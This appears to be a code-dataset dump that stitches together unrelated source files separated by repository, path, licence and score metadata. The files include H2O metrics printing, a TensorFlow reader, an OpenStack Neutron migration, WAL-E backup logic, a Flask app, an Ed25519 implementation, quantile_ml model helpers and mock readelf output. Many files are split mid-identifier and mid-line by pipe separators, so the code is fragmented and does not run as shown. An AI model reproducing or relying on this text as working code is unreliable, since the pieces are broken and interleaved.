'ModelMetricsOrdinal', 'ModelMetricsOrdinalGeneric'] + types_w_mult
types_w_logloss = types_w_bin + types_w_mult+types_w_ord
types_w_dim = ["ModelMetricsGLRM"]
types_w_anomaly = ['ModelMetricsAnomaly']
types_w_cox = ['ModelMetricsRegressionCoxPH']
types_w_uplift = ['ModelMetricsBinomialUplift']
print()
print(metric_type + ": " + self._algo)
reported_on = "** Reported on {} data. **"
if self._on_train:
print(reported_on.format("train"))
elif self._on_valid:
print(reported_on.format("validation"))
elif self._on_xval:
print(reported_on.format("cross-validation"))
else:
print(reported_on.format("test"))
print()
if metric_type not in types_w_anomaly and metric_type not in types_w_uplift and \
metric_type not in types_w_clustering:
print("MSE: " + str(self.mse()))
print("RMSE: " + str(self.rmse()))
if metric_type in types_w_mean_absolute_error:
print("MAE: " + str(self.mae()))
print("RMSLE: " + str(self.rmsle()))
if metric_type in types_w_r2:
print("R^2: " + str(self.r2()))
if metric_type in types_w_mean_residual_deviance:
print("Mean Residual Deviance: " + str(self.mean_residual_deviance()))
if metric_type in types_w_logloss:
print("LogLoss: " + str(self.logloss()))
if metric_type in types_w_mean_per_class_error:
print("Mean Per-Class Error: %s" % self._mean_per_class_error())
if metric_type in types_w_glm:
if metric_type == 'ModelMetricsHGLMGaussianGaussian': # print something for HGLM
print("Standard error of fixed columns: "+str(self.hglm_metric("sefe")))
print("Standard error of random columns: "+str(self.hglm_metric("sere")))
print("Coefficients for fixed columns: "+str(self.hglm_metric("fixedf")))
print("Coefficients for random columns: "+str(self.hglm_metric("ranef")))
print("Random column indices: "+str(self.hglm_metric("randc")))
print("Dispersion parameter of the mean model (residual variance for LMM): "+str(self.hglm_metric("varfix")))
print("Dispersion parameter of the random columns (variance of random columns): "+str(self.hglm_metric("varranef")))
print("Convergence reached for algorithm: "+str(self.hglm_metric("converge")))
print("Deviance degrees of freedom for mean part of the model: "+str(self.hglm_metric("dfrefe")))
print("Estimates and standard errors of the linear prediction in the dispersion model: "+str(self.hglm_metric("summvc1")))
print("Estimates and standard errors of the linear predictor for the dispersion parameter of the random columns: "+str(self.hglm_metric("summvc2")))
print("Index of most influential observation (-1 if none): "+str(self.hglm_metric("bad")))
print("H-likelihood: "+str(self.hglm_metric("hlik")))
print("Profile log-likelihood profiled over random columns: "+str(self.hglm_metric("pvh")))
print("Adjusted profile log-likelihood profiled over fixed and random effects: "+str(self.hglm_metric("pbvh")))
print("Conditional AIC: "+str(self.hglm_metric("caic")))
else:
|
ml-101/templates
|
readers.py
|
Python
|
mit
| 1,577
| 0.001268
|
import tens
|
orflow as tf
import tensorflow.contrib.slim as slim
class BaseReader(object):
def read(self):
raise NotImplementedError()
class ImageReader(BaseReader):
def __init__(self):
self.width = None
self.height = None
def get_image_size(self):
return self.width, self.height
def set_image_size(self, width, height):
self.width = width
self.height = height
def read(self, fil
|
ename, num_classes, batch_size=256, feature_map=None):
assert(self.width is not None and self.height is not None)
assert(self.width > 0 and self.height > 0)
reader = tf.TFRecordReader()
tf.add_to_collection(filename, batch_size) # is this really needed?
key, value = reader.read_up_to(filename, batch_size)
if feature_map is None:
feature_map = {
'label': tf.FixedLenFeature([], tf.int64),
'image_raw': tf.FixedLenFeature([self.width * self.height], tf.int64),
}
features = tf.parse_example(value, features=feature_map)
images = tf.cast(features["image_raw"], tf.float32) * (1. / 255)
if feature_map.get('label') is not None:
labels = tf.cast(features['label'], tf.int32)
one_hot = tf.map_fn(lambda x: tf.cast(slim.one_hot_encoding(x, num_classes), tf.int32), labels)
one_hot = tf.reshape(one_hot, [-1, num_classes])
return one_hot, images
empty_labels = tf.reduce_sum(tf.zeros_like(images), axis=1)
return empty_labels, images
|
ntt-sic/neutron
|
neutron/db/migration/alembic_migrations/versions/53bbd27ec841_extra_dhcp_opts_supp.py
|
Python
|
apache-2.0
| 2,051
| 0.002438
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0
|
(the "License"); you may
# not us
|
e this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Extra dhcp opts support
Revision ID: 53bbd27ec841
Revises: 40dffbf4b549
Create Date: 2013-05-09 15:36:50.485036
"""
# revision identifiers, used by Alembic.
revision = '53bbd27ec841'
down_revision = '40dffbf4b549'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = [
'neutron.plugins.openvswitch.ovs_neutron_plugin.OVSNeutronPluginV2'
]
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.create_table(
'extradhcpopts',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('port_id', sa.String(length=36), nullable=False),
sa.Column('opt_name', sa.String(length=64), nullable=False),
sa.Column('opt_value', sa.String(length=255), nullable=False),
sa.ForeignKeyConstraint(['port_id'], ['ports.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('port_id', 'opt_name', name='uidx_portid_optname'))
def downgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
### commands auto generated by Alembic - please adjust! ###
op.drop_table('extradhcpopts')
### end Alembic commands ###
|
tenstartups/wal-e
|
wal_e/operator/backup.py
|
Python
|
bsd-3-clause
| 23,283
| 0
|
import errno
import functools
import gevent
import gevent.pool
import itertools
import json
import os
import sys
from io import StringIO
from wal_e import log_help
from wal_e import storage
from wal_e import tar_partition
from wal_e.exception import UserException, UserCritical
from wal_e.worker import prefetch
from wal_e.worker import (WalSegment,
WalUploader,
PgBackupStatements,
PgControlDataParser,
PartitionUploader,
TarUploadPool,
WalTransferGroup,
uri_put_file,
do_lzop_get)
# File mode on directories created during restore process
DEFAULT_DIR_MODE = 0o700
# Provides guidence in object names as to the version of the file
# structure.
FILE_STRUCTURE_VERSION = storage.CURRENT_VERSION
logger = log_help.WalELogger(__name__)
class Backup(object):
def __init__(self, layout, creds, gpg_key_id):
self.layout = layout
self.creds = creds
self.gpg_key_id = gpg_key_id
self.exceptions = []
def new_connection(self):
return self.cinfo.connect(self.creds)
def backup_list(self, query, detail):
"""
Lists base backups and basic information about them
"""
import csv
from wal_e.storage.base import BackupInfo
bl = self._backup_list(detail)
# If there is no query, return an exhaustive list, otherwise
# find a backup instead.
if query is None:
bl_iter = bl
else:
bl_iter = bl.find_all(query)
# TODO: support switchable formats for difference needs.
w_csv = csv.writer(sys.stdout, dialect='excel-tab')
w_csv.writerow(BackupInfo._fields)
for bi in bl_iter:
w_csv.writerow([getattr(bi, k) for k in BackupInfo._fields])
sys.stdout.flush()
def database_fetch(self, pg_cluster_dir, backup_name,
blind_restore, restore_spec, pool_size):
if os.path.exists(os.path.join(pg_cluster_dir, 'postmaster.pid')):
hint = ('Shut down postgres. If there is a stale lockfile, '
'then remove it after being very sure postgres is not '
'running.')
raise UserException(
msg='attempting to overwrite a live data directory',
detail='Found a postmaster.pid lockfile, and aborting',
hint=hint)
bl = self._backup_list(False)
backups = list(bl.find_all(backup_name))
assert len(backups) <= 1
if len(backups) == 0:
raise UserException(
msg='no backups found for fetching',
detail=('No backup matching the query {0} '
'was able to be located.'.format(backup_name)))
elif len(backups) > 1:
raise UserException(
msg='more than one backup found for fetching',
detail=('More than one backup matching the query {0} was able '
'to be located.'.format(backup_name)),
hint='To list qualifying backups, '
'try "wal-e backup-list QUERY".')
# There must be exactly one qualifying backup at this point.
assert len(backups) == 1
assert backups[0] is not None
backup_info = backups[0]
backup_info.load_detail(self.new_connection())
self.layout.basebackup_tar_partition_directory(backup_info)
if restore_spec is not None:
if restore_spec != 'SOURCE':
if not os.path.isfile(restore_spec):
raise UserException(
msg='Restore specification does not exist',
detail='File not found: %s'.format(restore_spec),
hint=('Provide valid json-formatted restoration '
'specification, or pseudo-name "SOURCE" to '
'restore using the specification from the '
'backup progenitor.'))
with open(restore_spec, 'r') as fs:
spec = json.load(fs)
backup_info.spec.update(spec)
if 'base_prefix' not in backup_info.spec \
or not backup_info.spec['base_prefix']:
backup_info.spec['base_prefix'] = pg_cluster_dir
self._build_restore_paths(backup_info.spec)
else:
# If the user hasn't passed in a restoration specification
# use pg_cluster_dir as the resore prefix
backup_info.spec['base_prefix'] = pg_cluster_dir
if not blind_restore:
self._verify_restore_paths(backup_info.spec)
connections = []
for i in range(pool_size):
connections.append(self.new_connection())
partition_iter = self.worker.TarPartitionLister(
connections[0], self.layout, backup_info)
assert len(connections) == pool_size
fetchers = []
for i in range(pool_size):
fetchers.append(self.worker.BackupFetcher(
connections[i], self.layout, backup_info,
backup_info.spec['base_prefix'],
(self.gpg_key_id is not None)))
assert len(fetchers) == pool_size
p = gevent.pool.Pool(size=pool_size)
fetcher_cycle = itertools.cycle(fetchers)
for part_name in partition_iter:
p.spawn(
self._exception_gather_guard(
next(fetcher_cycle).fetch_partition),
part_name)
p.join(raise_error=True)
def database_backup(self, data_directory, *args, **kwargs):
"""Uploads a PostgreSQL file cluster to S3 or Windows Azure Blob
Service
Mechanism: just wraps _upload_pg_cluster_dir with
start/stop backup actions with exception handling.
In particular there is a 'finally' block to stop the backup in
most situations.
"""
upload_good = False
backup_stop_good = False
while_offline = False
start_backup_info = None
if 'while_offline' in kwargs:
while_offline = kwargs.pop('while_offline')
try:
if not while_offline:
start_backup_info = PgBackupStatements.run_start_backup()
version = PgBackupStatements.pg_version()['version']
else:
if os.path.exists(os.path.join(data_directory,
'postmaster.pid')):
hint = ('Shut down postgres. '
'If there is a stale lockfile, '
'then remove it after being very sure postgres '
'is not running.')
raise UserException(
msg='while_offline set, but pg looks to be running',
detail='Found a postmaster.pid lockfile, and aborting',
hint=hint)
ctrl_data = PgControlDataParser(data_directory)
start_backup_info = ctrl_data.last_xlog_file_name_and_offset()
version = ctrl_data.pg_version()
ret_tuple
|
= self._upload_pg_cluster_dir(
start_backup_info, data_directory, version=version, *args,
**kwargs)
spec, uploaded_to, expanded_size_bytes = ret_tuple
upload_good = True
finally:
if not upload_good:
logger.warning(
|
'blocking on sending WAL segments',
detail=('The backup was not completed successfully, '
'but we have to wait anyway. '
'See README: TODO about pg_cancel_backup'))
if not while_offline:
stop_backup_info = PgBackupStatements.run_stop_backup()
else:
stop_backup_info = start_backup_info
backup_stop_good = True
# XXX: Ugly, this is mo
|
kkelk/MeanRecipes
|
meanrecipes/__main__.py
|
Python
|
bsd-2-clause
| 832
| 0.009615
|
#!/usr/bin/env python3
from flask import Flask, url_for, render_template, make_response, request
from recipe import Recipe
from sources.allrecipes import AllRecipesSource
from average import average
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/recipe/search/<term>')
def recipe(term=None):
silliness = request.args.get('silliness', 50
|
)
source = AllRecipesSource()
intermediates = list(source.search(term))
working = Recipe(term, [], [])
recipe = average(intermediates, working, silliness=float(silliness) / 100)
resp = make_response(render_template('recipe.json', title=recipe.title, ingredients=recipe.ingredients, method=recipe.method))
|
resp.mimetype = 'application/json'
return resp
if __name__ == '__main__':
app.run(debug = True)
|
h4/fuit-webdev
|
examples/lesson2/1.4/1.4.8.py
|
Python
|
mit
| 132
| 0
|
# -*- encoding: utf-8 -*-
"""
Строка со специальными символ
|
ами
"""
s = 'a\0b\0c'
print s
p
|
rint len(s)
|
bmya/odoo-support
|
web_support_client/models/__init__.py
|
Python
|
lgpl-3.0
| 382
| 0
|
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file i
|
n module root
# directory
##############################################################################
from . import support
from . import res_users
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidt
|
h=4:
|
zwChan/VATEC
|
~/eb-virt/Lib/site-packages/wheel/signatures/djbec.py
|
Python
|
apache-2.0
| 6,755
| 0.014656
|
# Ed25519 digital signatures
# Based on http://ed25519.cr.yp.to/python/ed25519.py
# See also http://ed25519.cr.yp.to/software.html
# Adapted by Ron Garret
# Sped up considerably using coordinate transforms found on:
# http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
# Specifically add-2008-hwcd-4 and dbl-2008-hwcd
try: # pragma nocover
unicode
PY3 = False
def asbytes(b):
"""Convert array of integers to byte string"""
return ''.join(chr(x) for x in b)
def joinbytes(b):
"""Convert array of bytes to byte string"""
return ''.join(b)
def bit(h, i):
"""Return i'th bit of bytestring h"""
return (ord(h[i//8]) >> (i%8)) & 1
except NameError: # pragma nocover
PY3 = True
asbytes = bytes
joinbytes = bytes
def bit(h, i):
return (h[i//8] >> (i%8)) & 1
import hashlib
b = 256
q = 2**255 - 19
l = 2**252 + 27742317777372353535851937790883648493
def H(m):
return hashlib.sha512(m).digest()
def expmod(b, e, m):
if e == 0: return 1
t = expmod(b, e // 2, m) ** 2 % m
if e & 1: t = (t * b) % m
return t
# Can probably get some extra speedup here by replacing this with
# an extended-euclidean, but performance seems OK without that
def inv(x):
return expmod(x, q-2, q)
d = -121665 * inv(121666)
I = expmod(2,(q-1)//4,q)
def xrecover(y):
xx = (y*y-1) * inv(d*y*y+1)
x = expmod(xx,(q+3)//8,q)
if (x*x - xx) % q != 0: x = (x*I) % q
if x % 2 != 0: x = q-x
return x
By = 4 * inv(5)
Bx = xrecover(By)
B = [Bx % q,By % q]
#def edwards(P,Q):
# x1 = P[0]
# y1 = P[1]
# x2 = Q[0]
# y2 = Q[1]
# x3 = (x1*y2+x2*y1) * inv(1+d*x1*x2*y1*y2)
# y3 = (y1*y2+x1*x2) * inv(1-d*x1*x2*y1*y2)
# return (x3 % q,y3 % q)
#def scalarmult(P,e):
# if e == 0: return [0,1]
# Q = scalarmult(P,e/2)
# Q = edwards(Q,Q)
# if e & 1: Q = edwards(Q,P)
# return Q
# Faster (!) version based on:
# http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
d
|
ef xpt_add(pt1, pt2):
(X1, Y1, Z1, T1) = pt1
(X2, Y2, Z2, T2) = pt2
|
A = ((Y1-X1)*(Y2+X2)) % q
B = ((Y1+X1)*(Y2-X2)) % q
C = (Z1*2*T2) % q
D = (T1*2*Z2) % q
E = (D+C) % q
F = (B-A) % q
G = (B+A) % q
H = (D-C) % q
X3 = (E*F) % q
Y3 = (G*H) % q
Z3 = (F*G) % q
T3 = (E*H) % q
return (X3, Y3, Z3, T3)
def xpt_double (pt):
(X1, Y1, Z1, _) = pt
A = (X1*X1)
B = (Y1*Y1)
C = (2*Z1*Z1)
D = (-A) % q
J = (X1+Y1) % q
E = (J*J-A-B) % q
G = (D+B) % q
F = (G-C) % q
H = (D-B) % q
X3 = (E*F) % q
Y3 = (G*H) % q
Z3 = (F*G) % q
T3 = (E*H) % q
return (X3, Y3, Z3, T3)
def pt_xform (pt):
(x, y) = pt
return (x, y, 1, (x*y)%q)
def pt_unxform (pt):
(x, y, z, _) = pt
return ((x*inv(z))%q, (y*inv(z))%q)
def xpt_mult (pt, n):
if n==0: return pt_xform((0,1))
_ = xpt_double(xpt_mult(pt, n>>1))
return xpt_add(_, pt) if n&1 else _
def scalarmult(pt, e):
return pt_unxform(xpt_mult(pt_xform(pt), e))
def encodeint(y):
bits = [(y >> i) & 1 for i in range(b)]
e = [(sum([bits[i * 8 + j] << j for j in range(8)]))
for i in range(b//8)]
return asbytes(e)
def encodepoint(P):
x = P[0]
y = P[1]
bits = [(y >> i) & 1 for i in range(b - 1)] + [x & 1]
e = [(sum([bits[i * 8 + j] << j for j in range(8)]))
for i in range(b//8)]
return asbytes(e)
def publickey(sk):
h = H(sk)
a = 2**(b-2) + sum(2**i * bit(h,i) for i in range(3,b-2))
A = scalarmult(B,a)
return encodepoint(A)
def Hint(m):
h = H(m)
return sum(2**i * bit(h,i) for i in range(2*b))
def signature(m,sk,pk):
h = H(sk)
a = 2**(b-2) + sum(2**i * bit(h,i) for i in range(3,b-2))
inter = joinbytes([h[i] for i in range(b//8,b//4)])
r = Hint(inter + m)
R = scalarmult(B,r)
S = (r + Hint(encodepoint(R) + pk + m) * a) % l
return encodepoint(R) + encodeint(S)
def isoncurve(P):
x = P[0]
y = P[1]
return (-x*x + y*y - 1 - d*x*x*y*y) % q == 0
def decodeint(s):
return sum(2**i * bit(s,i) for i in range(0,b))
def decodepoint(s):
y = sum(2**i * bit(s,i) for i in range(0,b-1))
x = xrecover(y)
if x & 1 != bit(s,b-1): x = q-x
P = [x,y]
if not isoncurve(P): raise Exception("decoding point that is not on curve")
return P
def checkvalid(s, m, pk):
if len(s) != b//4: raise Exception("signature length is wrong")
if len(pk) != b//8: raise Exception("public-key length is wrong")
R = decodepoint(s[0:b//8])
A = decodepoint(pk)
S = decodeint(s[b//8:b//4])
h = Hint(encodepoint(R) + pk + m)
v1 = scalarmult(B,S)
# v2 = edwards(R,scalarmult(A,h))
v2 = pt_unxform(xpt_add(pt_xform(R), pt_xform(scalarmult(A, h))))
return v1==v2
##########################################################
#
# Curve25519 reference implementation by Matthew Dempsky, from:
# http://cr.yp.to/highspeed/naclcrypto-20090310.pdf
# P = 2 ** 255 - 19
P = q
A = 486662
#def expmod(b, e, m):
# if e == 0: return 1
# t = expmod(b, e / 2, m) ** 2 % m
# if e & 1: t = (t * b) % m
# return t
# def inv(x): return expmod(x, P - 2, P)
def add(n, m, d):
(xn, zn) = n
(xm, zm) = m
(xd, zd) = d
x = 4 * (xm * xn - zm * zn) ** 2 * zd
z = 4 * (xm * zn - zm * xn) ** 2 * xd
return (x % P, z % P)
def double(n):
(xn, zn) = n
x = (xn ** 2 - zn ** 2) ** 2
z = 4 * xn * zn * (xn ** 2 + A * xn * zn + zn ** 2)
return (x % P, z % P)
def curve25519(n, base=9):
one = (base,1)
two = double(one)
# f(m) evaluates to a tuple
# containing the mth multiple and the
# (m+1)th multiple of base.
def f(m):
if m == 1: return (one, two)
(pm, pm1) = f(m // 2)
if (m & 1):
return (add(pm, pm1, one), double(pm1))
return (double(pm), add(pm, pm1, one))
((x,z), _) = f(n)
return (x * inv(z)) % P
import random
def genkey(n=0):
n = n or random.randint(0,P)
n &= ~7
n &= ~(128 << 8 * 31)
n |= 64 << 8 * 31
return n
#def str2int(s):
# return int(hexlify(s), 16)
# # return sum(ord(s[i]) << (8 * i) for i in range(32))
#
#def int2str(n):
# return unhexlify("%x" % n)
# # return ''.join([chr((n >> (8 * i)) & 255) for i in range(32)])
#################################################
def dsa_test():
import os
msg = str(random.randint(q,q+q)).encode('utf-8')
sk = os.urandom(32)
pk = publickey(sk)
sig = signature(msg, sk, pk)
return checkvalid(sig, msg, pk)
def dh_test():
sk1 = genkey()
sk2 = genkey()
return curve25519(sk1, curve25519(sk2)) == curve25519(sk2, curve25519(sk1))
|
ZmG/openwhisk-tutorial
|
deploy_settings/urls.py
|
Python
|
apache-2.0
| 1,114
| 0.01167
|
#
# Copyright 2015-2016 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS"
|
BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language gover
|
ning permissions and
# limitations under the License.
#
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.views.generic import TemplateView
from whisk_tutorial import views
urlpatterns = patterns('',
url(r'^$', views.homepage, name="home"),
)
if settings.DEBUG is False: #if DEBUG is True it will be served automatically
print("In URLS - Debug False")
urlpatterns += patterns('',
url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),
)
|
anuragkumarak95/wordnet
|
wordnet/bin/__init__.py
|
Python
|
gpl-3.0
| 90
| 0.011111
|
# Author Anurag Kumar 12 Sept, 2017
#init file for t
|
his module..
from .paint import pa
|
int
|
doordash/auto_ml
|
quantile_ml/utils_models.py
|
Python
|
mit
| 24,465
| 0.002984
|
import dill
import os
import sys
from quantile_ml import utils_categorical_ensembling
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, ExtraTreesRegressor, AdaBoostRegressor, GradientBoostingRegressor, GradientBoostingClassifier, ExtraTreesClassifier, AdaBoostClassifier
from sklearn.linear_model import RandomizedLasso, RandomizedLogisticRegression, RANSACRegressor, LinearRegression, Ridge, Lasso, ElasticNet, LassoLars, OrthogonalMatchingPursuit, BayesianRidge, ARDRegression, SGDRegressor, PassiveAggressiveRegressor, LogisticRegression, RidgeClassifier, SGDClassifier, Perceptron, PassiveAggressiveClassifier
from sklearn.cluster import MiniBatchKMeans
xgb_installed = False
try:
from xgboost import XGBClassifier, XGBRegressor
xgb_installed = True
except ImportError:
pass
lgb_installed = False
try:
from lightgbm import LGBMRegressor, LGBMClassifier
lgb_installed = True
except ImportError:
pass
# Note: it's important that importing tensorflow come last. We can run into OpenCL issues if we import it ahead of some other packages. At the moment, it's a known behavior with tensorflow, but everyone's ok with this workaround.
keras_installed = False
try:
# Suppress some level of logs
os.environ['TF_CPP_MIN_VLOG_LEVEL'] = '3'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
from tensorflow import logging
logging.set_verbosity(logging.INFO)
from keras.constraints import maxnorm
from keras.layers import Dense, Dropout
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.models import Sequential
from keras.models import load_model as keras_load_model
from keras import regularizers
from keras.wrappers.scikit_learn import KerasRegressor, KerasClassifier
keras_installed = True
except ImportError as e:
print('error importing keras')
print(e)
pass
from quantile_ml import utils
def get_model_from_name(model_name, training_params=None):
# For Keras
epochs = 250
if os.environ.get('is_test_suite', 0) == 'True' and model_name[:12] == 'DeepLearning':
print('Heard that this is the test suite. Limiting number of epochs, which will increase training speed dramatically at the expense of model accuracy')
epochs = 30
all_model_params = {
'LogisticRegression': {'n_jobs': -2},
'RandomForestClassifier': {'n_jobs': -2},
'ExtraTreesClassifier': {'n_jobs': -1},
'AdaBoostClassifier': {'n_estimators': 10},
'SGDClassifier': {'n_jobs': -1},
'Perceptron': {'n_jobs': -1},
'LinearRegression': {'n_jobs': -2},
'RandomForestRegressor': {'n_jobs': -2},
'ExtraTreesRegressor': {'n_jobs': -1},
'MiniBatchKMeans': {'n_clusters': 8},
'GradientBoostingRegressor': {'presort': False},
'SGDRegressor': {'shuffle': False},
'PassiveAggressiveRegressor': {'shuffle': False},
'AdaBoostRegressor': {'n_estimators': 10},
'XGBRegressor': {'nthread':-1, 'n_estimators': 200},
'XGBClassifier': {'nthread':-1, 'n_estimators': 200},
'LGBMRegressor': {},
'LGBMClassifier': {},
'DeepLearningRegressor': {'epochs': epochs, 'batch_size': 50, 'verbose': 2},
'DeepLearningClassifier': {'epochs': epochs, 'batch_size': 50, 'verbose': 2}
}
model_params = all_model_params.get(model_name, None)
if model_params is None:
model_params = {}
if training_params is not None:
print('Now using the model training_params that you passed in:')
print(training_params)
# Overwrite our stock params with what the user passes in (i.e., if the user wants 10,000 trees, we will let them do it)
model_params.update(training_params)
print('After overwriting our defaults with your values, here are the final params that will be used to initialize the model:')
print(model_params)
model_map = {
# Classifiers
'LogisticRegression': LogisticRegression(),
'RandomForestClassifier': RandomForestClassifier(),
'RidgeClassifier': RidgeClassifier(),
'GradientBoostingClassifier': GradientBoostingClassifier(),
'ExtraTreesClassifier': ExtraTreesClassifier(),
'AdaBoostClassifier': AdaBoostClassifier(),
'SGDClassifier': SGDClassifier(),
'Perceptron': Perceptron(),
'PassiveAggressiveClassifier': PassiveAggressiveClassifier(),
# Regressors
'LinearRegression': LinearRegression(),
'RandomForestRegressor': RandomForestRegressor(),
'Ridge': Ridge(),
'ExtraTreesRegressor': ExtraTreesRegressor(),
'AdaBoostRegressor': AdaBoostRegressor(),
'RANSACRegressor': RANSACRegressor(),
'GradientBoostingRegressor': GradientBoostingRegressor(),
'Lasso': Lasso(),
'ElasticNet': ElasticNet(),
'LassoLars': LassoLars(),
'OrthogonalMatchingPursuit': OrthogonalMatchingPursuit(),
'BayesianRidge': BayesianRidge(),
'ARDRegression': ARDRegression(),
'SGDRegressor': SGDRegressor(),
'PassiveAggressiveRegressor': PassiveAggressiveRegressor(),
# Clustering
'MiniBatchKMeans': MiniBatchKMeans()
}
if xgb_installed:
model_map['XGBClassifier'] = XGBClassifier()
model_map['XGBRegressor'] = XGBRegressor()
if lgb_installed:
model_map['LGBMRegressor'] = LGBMRegressor()
model_map['LGBMClassifier'] = LGBMClassifier()
if keras_installed:
model_map['DeepLearningClassifier'] = KerasClassifier(build_fn=make_deep_learning_classifier)
model_map['DeepLearningRegressor'] = KerasRegressor(build_fn=make_deep_learning_model)
try:
model_without_params = model_map[model_name]
except KeyError as e:
print('It appears you are trying to use a library that is not available when we try to import it, or using a value for model_names that we do not recognize')
raise(e)
model_with_params = model_without_params.set_params(**model_params)
return model_with_params
def get_name_from_model(model):
if isinstance
|
(model, LogisticRegression):
return 'LogisticRegression'
if isinstance(model, RandomForestClassifier):
return 'RandomForestClassifier'
if isinstance(model, RidgeClassifier):
return 'RidgeClassifier'
if isinstance(model, GradientBoostingClassifier):
return 'GradientBoostingClassifier'
if isinstan
|
ce(model, ExtraTreesClassifier):
return 'ExtraTreesClassifier'
if isinstance(model, AdaBoostClassifier):
return 'AdaBoostClassifier'
if isinstance(model, SGDClassifier):
return 'SGDClassifier'
if isinstance(model, Perceptron):
return 'Perceptron'
if isinstance(model, PassiveAggressiveClassifier):
return 'PassiveAggressiveClassifier'
if isinstance(model, LinearRegression):
return 'LinearRegression'
if isinstance(model, RandomForestRegressor):
return 'RandomForestRegressor'
if isinstance(model, Ridge):
return 'Ridge'
if isinstance(model, ExtraTreesRegressor):
return 'ExtraTreesRegressor'
if isinstance(model, AdaBoostRegressor):
return 'AdaBoostRegressor'
if isinstance(model, RANSACRegressor):
return 'RANSACRegressor'
if isinstance(model, GradientBoostingRegressor):
return 'GradientBoostingRegressor'
if isinstance(model, Lasso):
return 'Lasso'
if isinstance(model, ElasticNet):
return 'ElasticNet'
if isinstance(model, LassoLars):
return 'LassoLars'
if isinstance(model, OrthogonalMatchingPursuit):
return 'OrthogonalMatchingPursuit'
if isinstance(model, BayesianRidge):
return 'BayesianRidge'
if isinstance(model, ARDRegression):
return 'ARDRegression'
if isinstance(model, SGDRegressor):
return 'SGDRegressor'
if isinstance(model, PassiveAggressiveRegressor):
return 'PassiveAggressiveRegressor'
if isinstance(model, MiniBatchKMeans):
return 'MiniBatchKMeans'
if xgb_installed:
if isinstance(mod
|
scheib/chromium
|
tools/binary_size/libsupersize/testdata/mock_toolchain/mock_readelf.py
|
Python
|
bsd-3-clause
| 11,261
| 0.007459
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
_HEADERS = """ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: ARM
Version: 0x1
Entry point address: 0x0
Start of program headers: 52 (bytes into file)
Start of section headers: 628588000 (bytes into file)
Flags: 0x5000200, Version5 EABI, soft-float ABI
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 40
Section header string table index: 39
"""
_SECTIONS = """There are 40 section headers, starting at offset 0x25777de0:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 00000154 000154 000013 00 A 0 0 1
[ 2] .note.gnu.build-id NOTE 00000168 000168 000024 00 A 0 0 4
[ 3] .dynsym DYNSYM 0000018c 00018c 001960 10 A 4 1 4
[ 4] .dynstr STRTAB 00001b0c 001b0c 000fb9 00 A 0 0 1
[ 5] .hash HASH 00002ad4 002ad4 000a7c 04 A 3 0 4
[ 6] .gnu.version VERSYM 00003558 003558 00032c 02 A 3 0 2
[ 7] .gnu.version_d VERDEF 00003888 003888 00001c 00 A 4 1 4
[ 8] .gnu.version_r VERNEED 000038a4 0038a4 000060 00 A 4 3 4
[ 9] .rel.dyn REL 00003904 003904 288498 08 A 3 0 4
[10] .rel.plt REL 0029fbec 29fbec 000b00 08 A 3 0 4
[11] .plt PROGBITS 002a06ec 2a06ec 001094 00 AX 0 0 4
[12] .text PROGBITS 0028d900 28d900 2250ba8 00 AX 0 0 64
[13] .rodata PROGBITS 0266e5f0 000084 5a72e4 00 A 0 0 256
[14] .ARM.exidx ARM_EXIDX 02bd3d10 2bd3d10 1771c8 08 AL 12 0 4
[15] .ARM.extab PROGBITS 02bd5858 2bd5858 02cd50 00 A 0 0 4
[16] .data.rel
|
.ro
|
.local PROGBITS 02c176f0 2c166f0 0c0e08 00 WA 0 0 16
[17] .data.rel.ro PROGBITS 02cd8500 2cd8500 104108 00 WA 0 0 16
[18] .init_array INIT_ARRAY 02ddc608 2ddc608 000008 00 WA 0 0 4
[19] .fini_array FINI_ARRAY 02ddc6f4 2ddc6f4 000008 00 WA 0 0 4
[20] .dynamic DYNAMIC 02ddc6fc 2ddc6fc 000130 08 WA 4 0 4
[21] .got PROGBITS 02ddc834 2ddc834 00a7cc 00 WA 0 0 4
[22] .data PROGBITS 02de7000 2de7000 018d88 00 WA 0 0 32
[23] .bss NOBITS 02dffda0 2dffda0 13d7e8 00 WA 0 0 32
[35] .note.gnu.gold-version NOTE 00000000 22700c98 00001c 00 0 0 4
